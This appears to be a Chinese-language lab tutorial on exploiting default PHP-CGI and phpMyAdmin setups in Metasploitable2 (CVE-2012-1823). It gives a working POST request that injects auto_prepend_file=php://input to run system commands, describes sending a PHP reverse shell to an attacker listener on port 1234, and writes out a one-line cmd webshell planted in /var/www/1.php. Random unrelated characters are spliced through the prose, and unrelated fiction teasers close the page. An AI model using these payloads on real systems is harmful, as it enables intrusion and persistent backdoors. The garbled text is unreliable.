二十一裁蚁、手動(dòng)漏洞挖掘:(1)默認(rèn)安裝配置漏洞

1痹届、phpMyAdmin/setup

在metasploit2中,可以測(cè)試其漏洞别智,由于其mysql是由phpMyAdmin來(lái)管理,因此直接訪問(wèn),可以看到

setup訪問(wèn)控制

1.1爽室、php根據(jù)版本直接執(zhí)行調(diào)用系統(tǒng)命令

通過(guò)使用-d指定auto_prepend_file來(lái)制造任意文件包含漏洞,執(zhí)行任意代碼:

POST /phpMyAdmin/?-d+allow_url_include%3dOn+-d
+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 192.168.1.102       //要訪問(wèn)的服務(wù)IP地址
<?php
passthru('id');           //或者是passthru等系統(tǒng)執(zhí)行命令
die();
?>
漏洞遠(yuǎn)程執(zhí)行效果

如果是一段執(zhí)行木馬淆攻,可以直接再后臺(tái)運(yùn)行阔墩,舉例:將“abcdefghigk”寫入到新建的a.php文件中,并查看

寫入文本
結(jié)果驗(yàn)證

1.2瓶珊、PHP反彈shell

在kali自帶一些php的木馬啸箫,可以拿來(lái)直接使用/usr/share/webshells/php/php-reverse-shell.php。復(fù)制此文件到桌面為2.php伞芹,然后編輯此文件忘苛,修改其中的參數(shù)蝉娜,其中IP為kali即反彈到的IP地址
修改IP地址和端口

修改IP地址和端口

將整個(gè)2.php文本復(fù)制到request請(qǐng)求中,而不是往目標(biāo)服務(wù)器寫入一個(gè)文件
復(fù)制反彈程序

在kali上開啟監(jiān)聽端口

監(jiān)聽1234端口

在repeater上執(zhí)行g(shù)o

Paste_Image.png

查看結(jié)果

目標(biāo)主機(jī)shell反彈到kali

而作為ifconfig等命令并不能夠執(zhí)行扎唾,因?yàn)槭怯脩羰莣ww-data召川,ifconfig不一定能夠執(zhí)行,該如何處理胸遇?

通過(guò)whereis找到ifconfig
進(jìn)入/sbin執(zhí)行./ifconfig

1.3荧呐、webshell(靜態(tài)shell)

在上述的php程序中換成如下內(nèi)容,此內(nèi)容可以理解成木馬文件纸镊,寫入到1.php倍阐,然后在http訪問(wèn)此文件即能夠執(zhí)行命令。

<?php
system('echo "<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>" > /var/www/1.php')
die();
?>
寫入木馬文件
查看是否存在1.php

訪問(wèn)http://192.168.1.102并將cmd=id(或其他命令)查看結(jié)果逗威,可直接執(zhí)行峰搪。


驗(yàn)證結(jié)果

[PHP-CGI遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2012-1823)分析參考鏈接]https://www.leavesongs.com/PENETRATION/php-cgi-cve-2012-1823.html

2、PHP5-CGI

采用默認(rèn)安裝PHP5-CGI時(shí)凯旭,/cgi-bin/php5 和 /cgi-bin/php由于不在/var/www(網(wǎng)站目錄)下概耻,因此爬網(wǎng)是爬不出來(lái)的,但是是能夠直接訪問(wèn)的尽纽,通過(guò)構(gòu)造php程序可以執(zhí)行執(zhí)行咐蚯。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市弄贿,隨后出現(xiàn)的幾起案子春锋,更是在濱河造成了極大的恐慌,老刑警劉巖差凹,帶你破解...
    沈念sama閱讀 217,734評(píng)論 6 505
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件期奔,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡危尿,警方通過(guò)查閱死者的電腦和手機(jī)呐萌,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,931評(píng)論 3 394
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)谊娇,“玉大人肺孤,你說(shuō)我怎么就攤上這事〖没叮” “怎么了赠堵?”我有些...
    開封第一講書人閱讀 164,133評(píng)論 0 354
  • 文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)法褥。 經(jīng)常有香客問(wèn)我茫叭,道長(zhǎng),這世上最難降的妖魔是什么半等? 我笑而不...
    開封第一講書人閱讀 58,532評(píng)論 1 293
  • 正文 為了忘掉前任揍愁,我火速辦了婚禮呐萨,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘莽囤。我一直安慰自己谬擦,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,585評(píng)論 6 392
  • 文/花漫 我一把揭開白布朽缎。 她就那樣靜靜地躺著怯屉,像睡著了一般。 火紅的嫁衣襯著肌膚如雪饵沧。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,462評(píng)論 1 302
  • 那天赌躺,我揣著相機(jī)與錄音狼牺,去河邊找鬼。 笑死礼患,一個(gè)胖子當(dāng)著我的面吹牛是钥,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播缅叠,決...
    沈念sama閱讀 40,262評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼悄泥,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來(lái)了肤粱?” 一聲冷哼從身側(cè)響起弹囚,我...
    開封第一講書人閱讀 39,153評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎领曼,沒(méi)想到半個(gè)月后鸥鹉,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,587評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡庶骄,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,792評(píng)論 3 336
  • 正文 我和宋清朗相戀三年毁渗,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片单刁。...
    茶點(diǎn)故事閱讀 39,919評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡灸异,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出羔飞,到底是詐尸還是另有隱情肺樟,我是刑警寧澤,帶...
    沈念sama閱讀 35,635評(píng)論 5 345
  • 正文 年R本政府宣布褥傍,位于F島的核電站儡嘶,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏恍风。R本人自食惡果不足惜蹦狂,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,237評(píng)論 3 329
  • 文/蒙蒙 一誓篱、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧凯楔,春花似錦窜骄、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,855評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至虐骑,卻和暖如春准验,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背廷没。 一陣腳步聲響...
    開封第一講書人閱讀 32,983評(píng)論 1 269
  • 我被黑心中介騙來(lái)泰國(guó)打工糊饱, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人颠黎。 一個(gè)月前我還...
    沈念sama閱讀 48,048評(píng)論 3 370
  • 正文 我出身青樓另锋,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親狭归。 傳聞我的和親對(duì)象是個(gè)殘疾皇子夭坪,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,864評(píng)論 2 354

推薦閱讀更多精彩內(nèi)容